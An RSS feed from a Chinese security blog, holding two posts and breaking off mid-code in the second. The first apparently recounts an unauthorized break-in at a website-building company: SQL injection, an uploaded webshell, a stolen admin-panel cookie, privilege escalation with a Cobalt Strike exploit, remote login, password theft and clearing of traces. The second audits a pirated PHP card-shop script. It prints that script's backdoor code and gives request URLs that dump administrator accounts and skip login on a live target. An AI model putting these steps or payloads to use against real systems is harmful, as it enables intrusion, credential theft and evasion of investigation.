<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>实战 &#8211; ChaBug安全</title>
	<atom:link href="/tags/%E5%AE%9E%E6%88%98/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Fri, 23 Aug 2019 01:21:31 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>看我如何拿下某建站公司</title>
		<link>/web/654.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sat, 06 Jul 2019 17:20:50 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[cs]]></category>
		<category><![CDATA[getshell]]></category>
		<category><![CDATA[实战]]></category>
		<category><![CDATA[提权]]></category>
		<category><![CDATA[渗透]]></category>
		<guid isPermaLink="false">/?p=654</guid>

					<description><![CDATA[文章首发于T00LS,未经允许禁止转载 前言 记录某建站公司沦陷的过程。内容简单较为简单，欢迎各位表哥交流指导。 getshell 目标是某建站公司，大致看了一下伪静态，没什么直接...]]></description>
										<content:encoded><![CDATA[<blockquote>
<p class="md-end-block md-p md-focus"><span class="md-plain md-expand">文章首发于</span><span class=" md-link"><a spellcheck="false" href="https://www.t00ls.net/articles-50574.html" target="_blank" rel="nofollow noopener noreferrer"><span class="md-plain">T00LS</span></a></span><span class="md-plain md-expand">,未经允许禁止转载</span></p>
</blockquote>
<h2 class="md-end-block md-heading" contenteditable="true"><span class="md-plain">前言</span></h2>
<p class="md-end-block md-p" contenteditable="true"><span class="md-plain">记录某建站公司沦陷的过程。内容简单较为简单，欢迎各位表哥交流指导。</span></p>
<h2 class="md-end-block md-heading" contenteditable="true"><span class="md-plain"><a class="tag_link" title="浏览关于“getshell”的文章" href="/tags/getshell" target="_blank" rel="noopener noreferrer">getshell</a></span></h2>
<p class="md-end-block md-p" contenteditable="true"><span class="md-plain">目标是某建站公司，大致看了一下伪静态，没什么直接撸的欲望，一边扫着端口的同时，一边测了几个案例网站。 </span><span class="md-plain">好在没让我失望，注入一枚</span></p>
<p class="md-end-block md-p" contenteditable="true"><span class="md-image md-img-loaded" data-src="https://i.loli.net/2019/04/03/5ca49af438ca7.png"><img src="https://i.loli.net/2019/04/03/5ca49af438ca7.png" alt="看我如何拿下某建站公司-ChaBug安全" /></span></p>
<p class="md-end-block md-p" contenteditable="true"><span class="md-plain">这个时候端口也扫完了，有两个端口引起了我的注意，999和6588。分别是phpmyadmin和护卫神。</span> <span class="md-plain">尝试了一下弱口令都无果，整理了一下收集到的信息，以及可利用的点。</span> <span class="md-plain">案例站大部分与建站公司的网站在同一个服务器上，服务器为 iis7.5,windows2008（存在解析漏洞）</span> <span class="md-plain">此时有几种方式<span class="wpcom_tag_link"><a href="/tags/getshell" title="getshell" target="_blank">getshell</a></span>： </span><span class="md-plain">1.直接注入into outfile</span> <span class="md-plain">2.前台随便找一个上传点传一个包含一句话的图片</span> <span class="md-plain">3.注入案例站读取管理员密码后台上传</span> <span class="md-plain">4.挖其他漏洞如：远程文件包含等可直接getshell漏洞</span> <span class="md-plain">第一二条都失败了，案例站的数据库用户没有读写权限，前台无上传点，由于第四条相对于来说需要另外的时间去挖并且远程包含这种基本没戏，所以最终只能后台getshell了。</span><span class="md-image md-img-loaded" data-src="https://i.loli.net/2019/04/03/5ca49ae16235c.png"><img src="https://i.loli.net/2019/04/03/5ca49ae16235c.png" alt="看我如何拿下某建站公司-ChaBug安全" /></span><span class="md-plain">执行命令发现无法执行，应该是权限不够？</span><span class="md-image md-img-loaded" data-src="https://i.loli.net/2019/04/03/5ca49b2ac4594.png"><img src="https://i.loli.net/2019/04/03/5ca49b2ac4594.png" alt="看我如何拿下某建站公司-ChaBug安全" /></span><span class="md-plain">上传了aspx大马，访问500，心态炸裂。</span></p>
<p class="md-end-block md-p" contenteditable="true"><span class="md-image md-img-loaded" data-src="https://i.loli.net/2019/04/03/5ca49b3e3e988.png"><img src="https://i.loli.net/2019/04/03/5ca49b3e3e988.png" alt="看我如何拿下某建站公司-ChaBug安全" /></span></p>
<p class="md-end-block md-p" contenteditable="true"><span class="md-plain"><a class="tag_link" title="浏览关于“提权”的文章" href="/tags/%e6%8f%90%e6%9d%83" target="_blank" rel="noopener noreferrer">提权</a>思路：</span> <span class="md-plain">1.phpmyadmin直接udf<span class="wpcom_tag_link"><a href="/tags/%e6%8f%90%e6%9d%83" title="提权" target="_blank">提权</a></span>（无权限读写）</span> <span class="md-plain">2.登录护卫神，和流光表哥@赢时胜流光同样的方法 </span><span class="md-plain">3.搞一个可以解析aspx，权限高一点的网站？等 </span><span class="md-plain">最后利用2，3结合搞定。</span></p>
<h2 class="md-end-block md-heading" contenteditable="true"><span class="md-plain">登录护卫神后台+提权</span></h2>
<p class="md-end-block md-p" contenteditable="true"><span class="md-plain">护卫神的漏洞利用条件是可以上传可执行脚本，来读取本地登录护卫神的cookie。shell已经拿到了，直接上传脚本读取cookie。</span><span class="md-image md-img-loaded" data-src="https://i.loli.net/2019/04/03/5ca49b5c6e48d.png"><img src="https://i.loli.net/2019/04/03/5ca49b5c6e48d.png" alt="看我如何拿下某建站公司-ChaBug安全" /></span><span class="md-plain">f12 document.cookie 刷新:</span><span class="md-image md-img-loaded" data-src="https://i.loli.net/2019/04/03/5ca49b7f16533.png"><img src="https://i.loli.net/2019/04/03/5ca49b7f16533.png" alt="看我如何拿下某建站公司-ChaBug安全" /></span></p>
<p class="md-end-block md-p" contenteditable="true"><span class="md-image md-img-loaded" data-src="https://i.loli.net/2019/04/03/5ca49b85468da.png"><img src="https://i.loli.net/2019/04/03/5ca49b85468da.png" alt="看我如何拿下某建站公司-ChaBug安全" /></span></p>
<p class="md-end-block md-p" contenteditable="true"><span class="md-plain">这个护卫神是3.7版本的，没有找到上传点，但是不慌，有ftp账号密码，并且找到了支持asp,aspx的网站，直接上大马。</span><span class="md-image md-img-loaded" data-src="https://i.loli.net/2019/04/03/5ca49bd9de608.png"><img src="https://i.loli.net/2019/04/03/5ca49bd9de608.png" alt="看我如何拿下某建站公司-ChaBug安全" /></span><span class="md-plain">可以执行命令，补丁打了倒是不少，查了一下可以利用的exp，用论坛里的几个免杀的烂土豆exp都失败了，webshell版的也报错。</span></p>
<p class="md-end-block md-p" contenteditable="true"><span class="md-image md-img-loaded" data-src="https://i.loli.net/2019/04/03/5ca49bec85116.png"><img src="https://i.loli.net/2019/04/03/5ca49bec85116.png" alt="看我如何拿下某建站公司-ChaBug安全" /></span></p>
<p class="md-end-block md-p" contenteditable="true"><span class="md-plain">最后弹到<a class="tag_link" title="浏览关于“cs”的文章" href="/tags/cs" target="_blank" rel="noopener noreferrer">cs</a>上，随手试了一下<span class="wpcom_tag_link"><a href="/tags/cs" title="cs" target="_blank">cs</a></span>自带的提权exp ，ms14那个，尼玛成了。</span></p>
<p class="md-end-block md-p" contenteditable="true"><span class="md-image md-img-loaded" data-src="https://i.loli.net/2019/04/03/5ca49c130660f.png"><img src="https://i.loli.net/2019/04/03/5ca49c130660f.png" alt="看我如何拿下某建站公司-ChaBug安全" /></span></p>
<p class="md-end-block md-p" contenteditable="true"><span class="md-plain">tasklist /svc查看一下远程端口，由于是外网，直接登录。</span></p>
<p class="md-end-block md-p" contenteditable="true"><span class="md-image md-img-loaded" data-src="https://i.loli.net/2019/04/03/5ca49c3850489.png"><img src="https://i.loli.net/2019/04/03/5ca49c3850489.png" alt="看我如何拿下某建站公司-ChaBug安全" /></span></p>
<p class="md-end-block md-p" contenteditable="true"><span class="md-plain">读了管理员的密码，清理痕迹溜了。（密码是随机的十二位大小写加特殊字符，这谁顶得住啊） </span></p>
<h2 class="md-end-block md-heading" contenteditable="true"><span class="md-plain">总结</span></h2>
<p class="md-end-block md-p" contenteditable="true"><span class="md-plain">水文，每次搞完回头再看的时候都觉得没什么技术含量，的确也是没有什么骚操作，总结一下这次<a class="tag_link" title="浏览关于“渗透”的文章" href="/tags/%e6%b8%97%e9%80%8f" target="_blank" rel="noopener noreferrer">渗透</a>，只有这个读取cookie的php脚本，我学到了，嘻嘻嘻，溜溜球~</span></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>记一次由百度云会员引起的审计及渗透</title>
		<link>/web/653.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sat, 06 Jul 2019 17:19:44 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[代码]]></category>
		<category><![CDATA[代码审计]]></category>
		<category><![CDATA[实战]]></category>
		<guid isPermaLink="false">/?p=653</guid>

					<description><![CDATA[本文首发于secquan，未经许可禁止转载 百度云盘真的恶心，不开会员10k/s。 前言# 前天找了点域渗透的环境和资料，都是百度云盘存储的，一个镜像十几个g，下不下来，发现网上有...]]></description>
										<content:encoded><![CDATA[<blockquote>
<h1>本文首发于<a href="https://secquan.org/Discuss/1069217" target="_blank" rel="nofollow noopener noreferrer">secquan</a>，未经许可禁止转载</h1>
</blockquote>
<p>百度云盘真的恶心，不开会员10k/s。</p>
<h1 id="前言">前言#</h1>
<p>前天找了点域渗透的环境和资料，都是百度云盘存储的，一个镜像十几个g，下不下来，发现网上有卖百度云VIP账号的，都是一些发卡网，刚好自己最近在学<a class="tag_link" title="浏览关于“代码审计”的文章" href="/tags/%e4%bb%a3%e7%a0%81%e5%ae%a1%e8%ae%a1" target="_blank" rel="noopener noreferrer">代码审计</a>，就想着下载一套源码自己看看能不能审出漏洞。没想到还真看出来了点东西。</p>
<h1 id="开搞">开搞#</h1>
<p>目标站点<code>xx.com</code>扫出了<code>readme.txt</code>，是<strong>企业版PHP自动发卡源码免授权优化版</strong></p>
<div class="post-image"><img src="https://i.loli.net/2019/04/03/5ca44f26f1c2d.png" alt="记一次由百度云会员引起的审计及渗透-ChaBug安全" data-type="image" /></div>
<p>看到这免授权优化版我就知道有戏，很可能存在后门。网上找了一套</p>
<div class="post-image"><img src="https://i.loli.net/2019/04/03/5ca44ae953321.png" alt="记一次由百度云会员引起的审计及渗透-ChaBug安全" data-type="image" /></div>
<p>目录结构和目标站点一样，应该就是这套了。</p>
<p>本地搭建，然后源<a class="tag_link" title="浏览关于“代码”的文章" href="/tags/%e4%bb%a3%e7%a0%81" target="_blank" rel="noopener noreferrer">代码</a>扔到seay先跑着，我先大概看下架构</p>
<p><code>index.php</code>入口</p>
<div class="post-image"><img src="https://i.loli.net/2019/04/03/5ca44c7c0e494.png" alt="记一次由百度云会员引起的审计及渗透-ChaBug安全" data-type="image" /></div>
<p>典型的mvc架构</p>
<div class="post-image"><img src="https://i.loli.net/2019/04/03/5ca44d52a842a.png" alt="记一次由百度云会员引起的审计及渗透-ChaBug安全" data-type="image" /></div>
<p>伪静态重写URL</p>
<div class="post-image"><img src="https://i.loli.net/2019/04/03/5ca44d6f54b2b.png" alt="记一次由百度云会员引起的审计及渗透-ChaBug安全" data-type="image" /></div>
<p><span class="wpcom_tag_link"><a href="/tags/%e4%bb%a3%e7%a0%81%e5%ae%a1%e8%ae%a1" title="代码审计" target="_blank">代码审计</a></span>这方面我是新手，所以我的目标是找找sql注入、未授权访问、上传点以及越权，当然考虑到是免授权优化版，我还可以找找后门：文件遍历或者<span class="wpcom_tag_link"><a href="/tags/%e4%bb%a3%e7%a0%81" title="代码" target="_blank">代码</a></span>执行</p>
<h2 id="[后门?]文件遍历">[后门?]文件遍历#</h2>
<p><code>/bom.php</code>的<code>checkdir()</code>函数</p>
<div class="post-image"><img src="https://i.loli.net/2019/04/03/5ca44ea32b4b0.png" alt="记一次由百度云会员引起的审计及渗透-ChaBug安全" data-type="image" /></div>
<div class="post-image"><img src="https://i.loli.net/2019/04/03/5ca450121c74e.png" alt="记一次由百度云会员引起的审计及渗透-ChaBug安全" data-type="image" /></div>
<p>递归遍历当前目录下的所有文件。</p>
<p>这个文件应该是去除文件的bom头，不知道算不算后门。</p>
<h2 id="过滤方式">过滤方式#</h2>
<p><code>\includes\libs\Functions.php</code></p>
<div class="post-image"><img src="https://i.loli.net/2019/04/03/5ca451dcbba4f.png" alt="记一次由百度云会员引起的审计及渗透-ChaBug安全" data-type="image" /></div>
<p>全局<code>makeSafe()</code>函数过滤，强转数字，<code>addslashes()</code>和<code>mysql_real_escape_string()</code>转义字符串，<code>strip_tags</code>去除html标签</p>
<p><code>\includes\libs\Mysql.php</code></p>
<p>MySQL使用UTF8编码<img src="https://i.loli.net/2019/04/03/5ca4523a907e7.png" alt="记一次由百度云会员引起的审计及渗透-ChaBug安全" data-type="image" /></p>
<p>我发现的SQL语句变量全部使用单引号进行包裹，寄希望于seay，暂放。</p>
<h2 id="[后门]获取管理员账户">[后门]获取管理员账户#</h2>
<p><code>\admin\adminInfo.php</code>没有鉴权</p>
<p><img src="https://i.loli.net/2019/04/03/5ca453efb4bab.png" alt="记一次由百度云会员引起的审计及渗透-ChaBug安全" data-type="image" /></p>
<div id="crayon-5d1dfd3dca8ad344490696" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main">
<table class="crayon-table">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content">
<div class="crayon-num" data-line="crayon-5d1dfd3dca8ad344490696-1">1</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5d1dfd3dca8ad344490696-2">2</div>
<div class="crayon-num" data-line="crayon-5d1dfd3dca8ad344490696-3">3</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5d1dfd3dca8ad344490696-4">4</div>
<div class="crayon-num" data-line="crayon-5d1dfd3dca8ad344490696-5">5</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5d1dfd3dca8ad344490696-6">6</div>
<div class="crayon-num" data-line="crayon-5d1dfd3dca8ad344490696-7">7</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5d1dfd3dca8ad344490696-8">8</div>
<div class="crayon-num" data-line="crayon-5d1dfd3dca8ad344490696-9">9</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5d1dfd3dca8ad344490696-10">10</div>
<div class="crayon-num" data-line="crayon-5d1dfd3dca8ad344490696-11">11</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5d1dfd3dca8ad344490696-12">12</div>
<div class="crayon-num" data-line="crayon-5d1dfd3dca8ad344490696-13">13</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5d1dfd3dca8ad344490696-14">14</div>
<div class="crayon-num" data-line="crayon-5d1dfd3dca8ad344490696-15">15</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5d1dfd3dca8ad344490696-16">16</div>
<div class="crayon-num" data-line="crayon-5d1dfd3dca8ad344490696-17">17</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5d1dfd3dca8ad344490696-18">18</div>
<div class="crayon-num" data-line="crayon-5d1dfd3dca8ad344490696-19">19</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5d1dfd3dca8ad344490696-20">20</div>
<div class="crayon-num" data-line="crayon-5d1dfd3dca8ad344490696-21">21</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5d1dfd3dca8ad344490696-22">22</div>
<div class="crayon-num" data-line="crayon-5d1dfd3dca8ad344490696-23">23</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5d1dfd3dca8ad344490696-24">24</div>
<div class="crayon-num" data-line="crayon-5d1dfd3dca8ad344490696-25">25</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5d1dfd3dca8ad344490696-26">26</div>
<div class="crayon-num" data-line="crayon-5d1dfd3dca8ad344490696-27">27</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5d1dfd3dca8ad344490696-28">28</div>
</div>
</td>
<td class="crayon-code">
<div class="crayon-pre">
<div id="crayon-5d1dfd3dca8ad344490696-1" class="crayon-line"><span class="crayon-t">function</span> <span class="crayon-e">getmethod</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">{</span></div>
<div id="crayon-5d1dfd3dca8ad344490696-2" class="crayon-line crayon-striped-line"><span class="crayon-h">    </span><span class="crayon-sy">$</span><span class="crayon-v">ob</span> <span class="crayon-o">=</span> <span class="crayon-r">new</span> <span class="crayon-e">Admin_Model</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span></div>
<div id="crayon-5d1dfd3dca8ad344490696-3" class="crayon-line"><span class="crayon-h">    </span><span class="crayon-sy">$</span><span class="crayon-v">items</span> <span class="crayon-o">=</span> <span class="crayon-sy">$</span><span class="crayon-v">ob</span><span class="crayon-o">-&gt;</span><span class="crayon-e">getData</span><span class="crayon-sy">(</span><span class="crayon-cn">1</span><span class="crayon-sy">,</span> <span class="crayon-cn">10</span><span class="crayon-sy">,</span> <span class="crayon-s">&#8220;WHERE id &lt;&gt; -1&#8221;</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span></div>
<div id="crayon-5d1dfd3dca8ad344490696-4" class="crayon-line crayon-striped-line"><span class="crayon-h">    </span><span class="crayon-sy">$</span><span class="crayon-v">index</span> <span class="crayon-o">=</span> <span class="crayon-cn">0</span><span class="crayon-sy">;</span></div>
<div id="crayon-5d1dfd3dca8ad344490696-5" class="crayon-line"><span class="crayon-h">    </span><span class="crayon-i">echo</span> <span class="crayon-s">&#8220;&lt;table border=&#8217;1&#8242; style=&#8221;&gt;&#8221;</span><span class="crayon-sy">;</span></div>
<div id="crayon-5d1dfd3dca8ad344490696-6" class="crayon-line crayon-striped-line"><span class="crayon-h">    </span><span class="crayon-st">foreach</span><span class="crayon-sy">(</span><span class="crayon-sy">$</span><span class="crayon-e">items </span><span class="crayon-st">as</span> <span class="crayon-sy">$</span><span class="crayon-v">item</span><span class="crayon-sy">)</span><span class="crayon-sy">{</span></div>
<div id="crayon-5d1dfd3dca8ad344490696-7" class="crayon-line"><span class="crayon-h">        </span><span class="crayon-i">echo</span> <span class="crayon-s">&#8220;&lt;tr&gt;&#8221;</span><span class="crayon-sy">;</span></div>
<div id="crayon-5d1dfd3dca8ad344490696-8" class="crayon-line crayon-striped-line"><span class="crayon-h">        </span><span class="crayon-sy">$</span><span class="crayon-v">index</span> <span class="crayon-o">++</span><span class="crayon-sy">;</span></div>
<div id="crayon-5d1dfd3dca8ad344490696-9" class="crayon-line"><span class="crayon-h">        </span><span class="crayon-st">if</span><span class="crayon-sy">(</span><span class="crayon-sy">$</span><span class="crayon-v">index</span> <span class="crayon-o">==</span> <span class="crayon-cn">1</span><span class="crayon-sy">)</span><span class="crayon-sy">{</span><span class="crayon-h">        </span></div>
<div id="crayon-5d1dfd3dca8ad344490696-10" class="crayon-line crayon-striped-line"><span class="crayon-h">            </span><span class="crayon-st">foreach</span><span class="crayon-sy">(</span><span class="crayon-sy">$</span><span class="crayon-e">item </span><span class="crayon-st">as</span> <span class="crayon-sy">$</span><span class="crayon-v">key</span> <span class="crayon-o">=</span><span class="crayon-o">&gt;</span> <span class="crayon-sy">$</span><span class="crayon-v">val</span><span class="crayon-sy">)</span><span class="crayon-sy">{</span></div>
<div id="crayon-5d1dfd3dca8ad344490696-11" class="crayon-line"><span class="crayon-h">                </span><span class="crayon-st">if</span><span class="crayon-sy">(</span><span class="crayon-e">preg_match</span><span class="crayon-sy">(</span><span class="crayon-s">&#8220;/^\d*$/&#8221;</span><span class="crayon-sy">,</span><span class="crayon-sy">$</span><span class="crayon-v">key</span><span class="crayon-sy">)</span><span class="crayon-sy">)</span><span class="crayon-sy">{</span></div>
<div id="crayon-5d1dfd3dca8ad344490696-12" class="crayon-line crayon-striped-line"><span class="crayon-h">                    </span><span class="crayon-st">continue</span><span class="crayon-sy">;</span></div>
<div id="crayon-5d1dfd3dca8ad344490696-13" class="crayon-line"><span class="crayon-h">                </span><span class="crayon-sy">}</span></div>
<div id="crayon-5d1dfd3dca8ad344490696-14" class="crayon-line crayon-striped-line"><span class="crayon-h">                </span><span class="crayon-i">echo</span> <span class="crayon-s">&#8220;&lt;th&gt;$key&lt;/th&gt;&#8221;</span><span class="crayon-sy">;</span></div>
<div id="crayon-5d1dfd3dca8ad344490696-15" class="crayon-line"><span class="crayon-h">            </span><span class="crayon-sy">}</span></div>
<div id="crayon-5d1dfd3dca8ad344490696-16" class="crayon-line crayon-striped-line"><span class="crayon-h">            </span><span class="crayon-i">echo</span> <span class="crayon-s">&#8220;&lt;/tr&gt;&#8221;</span><span class="crayon-sy">;</span></div>
<div id="crayon-5d1dfd3dca8ad344490696-17" class="crayon-line"><span class="crayon-h">            </span><span class="crayon-i">echo</span> <span class="crayon-s">&#8220;&lt;tr&gt;&#8221;</span><span class="crayon-sy">;</span></div>
<div id="crayon-5d1dfd3dca8ad344490696-18" class="crayon-line crayon-striped-line"><span class="crayon-h">        </span><span class="crayon-sy">}</span></div>
<div id="crayon-5d1dfd3dca8ad344490696-19" class="crayon-line"><span class="crayon-h">        </span><span class="crayon-st">foreach</span><span class="crayon-sy">(</span><span class="crayon-sy">$</span><span class="crayon-e">item </span><span class="crayon-st">as</span> <span class="crayon-sy">$</span><span class="crayon-v">key</span> <span class="crayon-o">=</span><span class="crayon-o">&gt;</span> <span class="crayon-sy">$</span><span class="crayon-v">val</span><span class="crayon-sy">)</span><span class="crayon-sy">{</span></div>
<div id="crayon-5d1dfd3dca8ad344490696-20" class="crayon-line crayon-striped-line"><span class="crayon-h">            </span><span class="crayon-st">if</span><span class="crayon-sy">(</span><span class="crayon-e">preg_match</span><span class="crayon-sy">(</span><span class="crayon-s">&#8220;/^\d*$/&#8221;</span><span class="crayon-sy">,</span><span class="crayon-sy">$</span><span class="crayon-v">key</span><span class="crayon-sy">)</span><span class="crayon-sy">)</span><span class="crayon-sy">{</span></div>
<div id="crayon-5d1dfd3dca8ad344490696-21" class="crayon-line"><span class="crayon-h">                </span><span class="crayon-st">continue</span><span class="crayon-sy">;</span></div>
<div id="crayon-5d1dfd3dca8ad344490696-22" class="crayon-line crayon-striped-line"><span class="crayon-h">            </span><span class="crayon-sy">}</span></div>
<div id="crayon-5d1dfd3dca8ad344490696-23" class="crayon-line"><span class="crayon-h">            </span><span class="crayon-i">echo</span> <span class="crayon-s">&#8220;&lt;td&gt;$val&lt;/td&gt;&#8221;</span><span class="crayon-sy">;</span><span class="crayon-h">   </span></div>
<div id="crayon-5d1dfd3dca8ad344490696-24" class="crayon-line crayon-striped-line"><span class="crayon-h">        </span><span class="crayon-sy">}</span></div>
<div id="crayon-5d1dfd3dca8ad344490696-25" class="crayon-line"><span class="crayon-h">        </span><span class="crayon-i">echo</span> <span class="crayon-s">&#8220;&lt;/tr&gt;&#8221;</span><span class="crayon-sy">;</span></div>
<div id="crayon-5d1dfd3dca8ad344490696-26" class="crayon-line crayon-striped-line"><span class="crayon-h">    </span><span class="crayon-sy">}</span></div>
<div id="crayon-5d1dfd3dca8ad344490696-27" class="crayon-line"><span class="crayon-h">    </span><span class="crayon-i">echo</span> <span class="crayon-s">&#8220;&lt;/table&gt;&#8221;</span><span class="crayon-sy">;</span></div>
<div id="crayon-5d1dfd3dca8ad344490696-28" class="crayon-line crayon-striped-line"><span class="crayon-sy">}</span></div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<p>payload：<code>/admin/adminInfo.php?action=get</code></p>
<h2 id="[后门]无需密码登录后台">[后门]无需密码登录后台#</h2>
<p>还是<code>\admin\adminInfo.php</code></p>
<div id="crayon-5d1dfd3dca8b7805402794" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main">
<table class="crayon-table">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content">
<div class="crayon-num" data-line="crayon-5d1dfd3dca8b7805402794-1">1</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5d1dfd3dca8b7805402794-2">2</div>
<div class="crayon-num" data-line="crayon-5d1dfd3dca8b7805402794-3">3</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5d1dfd3dca8b7805402794-4">4</div>
<div class="crayon-num" data-line="crayon-5d1dfd3dca8b7805402794-5">5</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5d1dfd3dca8b7805402794-6">6</div>
<div class="crayon-num" data-line="crayon-5d1dfd3dca8b7805402794-7">7</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5d1dfd3dca8b7805402794-8">8</div>
</div>
</td>
<td class="crayon-code">
<div class="crayon-pre">
<div id="crayon-5d1dfd3dca8b7805402794-1" class="crayon-line"><span class="crayon-t">function</span> <span class="crayon-e">infomethod</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">{</span></div>
<div id="crayon-5d1dfd3dca8b7805402794-2" class="crayon-line crayon-striped-line"><span class="crayon-h">    </span><span class="crayon-sy">$</span><span class="crayon-v">ob</span> <span class="crayon-o">=</span> <span class="crayon-r">new</span> <span class="crayon-e">Admin_Model</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span></div>
<div id="crayon-5d1dfd3dca8b7805402794-3" class="crayon-line"><span class="crayon-h">    </span><span class="crayon-sy">$</span><span class="crayon-v">u</span> <span class="crayon-o">=</span> <span class="crayon-sy">$</span><span class="crayon-v">ob</span><span class="crayon-o">-&gt;</span><span class="crayon-e">getOneData</span><span class="crayon-sy">(</span><span class="crayon-sy">$</span><span class="crayon-v">_GET</span><span class="crayon-sy">[</span><span class="crayon-s">&#8216;id&#8217;</span><span class="crayon-sy">]</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span></div>
<div id="crayon-5d1dfd3dca8b7805402794-4" class="crayon-line crayon-striped-line"><span class="crayon-h">    </span><span class="crayon-sy">$</span><span class="crayon-v">_SESSION</span><span class="crayon-sy">[</span><span class="crayon-s">&#8216;login_adminname&#8217;</span><span class="crayon-sy">]</span><span class="crayon-o">=</span><span class="crayon-sy">$</span><span class="crayon-v">u</span><span class="crayon-sy">[</span><span class="crayon-s">&#8216;username&#8217;</span><span class="crayon-sy">]</span><span class="crayon-sy">;</span></div>
<div id="crayon-5d1dfd3dca8b7805402794-5" class="crayon-line"><span class="crayon-h">    </span><span class="crayon-sy">$</span><span class="crayon-v">_SESSION</span><span class="crayon-sy">[</span><span class="crayon-s">&#8216;login_adminid&#8217;</span><span class="crayon-sy">]</span><span class="crayon-o">=</span><span class="crayon-sy">$</span><span class="crayon-v">u</span><span class="crayon-sy">[</span><span class="crayon-s">&#8216;id&#8217;</span><span class="crayon-sy">]</span><span class="crayon-sy">;</span></div>
<div id="crayon-5d1dfd3dca8b7805402794-6" class="crayon-line crayon-striped-line"><span class="crayon-h">    </span><span class="crayon-sy">$</span><span class="crayon-v">_SESSION</span><span class="crayon-sy">[</span><span class="crayon-s">&#8216;login_adminutype&#8217;</span><span class="crayon-sy">]</span><span class="crayon-o">=</span><span class="crayon-sy">$</span><span class="crayon-v">u</span><span class="crayon-sy">[</span><span class="crayon-s">&#8216;utype&#8217;</span><span class="crayon-sy">]</span><span class="crayon-sy">;</span></div>
<div id="crayon-5d1dfd3dca8b7805402794-7" class="crayon-line"><span class="crayon-h">    </span><span class="crayon-sy">$</span><span class="crayon-v">_SESSION</span><span class="crayon-sy">[</span><span class="crayon-s">&#8216;login_adminlimit&#8217;</span><span class="crayon-sy">]</span><span class="crayon-o">=</span><span class="crayon-e">explode</span><span class="crayon-sy">(</span><span class="crayon-s">&#8216;|&#8217;</span><span class="crayon-sy">,</span><span class="crayon-sy">$</span><span class="crayon-v">u</span><span class="crayon-sy">[</span><span class="crayon-s">&#8216;adminlimit&#8217;</span><span class="crayon-sy">]</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span></div>
<div id="crayon-5d1dfd3dca8b7805402794-8" class="crayon-line crayon-striped-line"><span class="crayon-sy">}</span></div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<p>payload:先访问<code>/admin/adminInfo.php?action=info&amp;id=1</code>然后访问<code>/admin/</code></p>
<h2 id="[后门]SQL注入">[后门]SQL注入#</h2>
<p>还是<code>\admin\adminInfo.php</code>的<code>infomethod()</code>函数</p>
<div id="crayon-5d1dfd3dca8b9770505137" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main">
<table class="crayon-table">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content">
<div class="crayon-num" data-line="crayon-5d1dfd3dca8b9770505137-1">1</div>
</div>
</td>
<td class="crayon-code">
<div class="crayon-pre">
